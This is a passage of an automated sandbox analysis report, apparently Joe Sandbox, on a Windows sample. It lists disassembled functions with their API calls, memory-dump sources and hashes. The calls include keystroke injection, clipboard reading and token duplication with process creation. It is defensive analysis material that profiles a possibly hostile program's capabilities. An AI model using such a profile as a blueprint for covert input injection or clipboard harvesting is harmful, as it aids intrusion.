                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wfsopen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 197181222-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0493A064 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 0493A079
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f3d325d3e777a2a11ee3fff4a1b23e7fbe76b353539d6405e4b1897fbf865e44
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5E0BF7494020EEFDB10DFB4D5496DD7BB4EF05302F1005A5FD05D7690DB319E548A62
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0493A068 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 0493A079
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 14840b83674e242dd0f571ace080fddce5b586ef72e9b4e1f370f62a1e25d84e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EE0E67494020EEFDB00DFB4D54969D7BB4EF04302F100565FD05D2280D6319D508A62

                                                                                                                                                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00A67998,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_BeginDrag.COMCTL32(00A67998,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CD12
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CD80
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CE93
                                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,009C1A48,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,009C1A48,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3100379633-4164748364
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 0043444F
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2889586943-2988720461
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00446498
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                                                                                                                                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: $@OH$default$winsta0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3324942560-3791954436
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 15083398-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
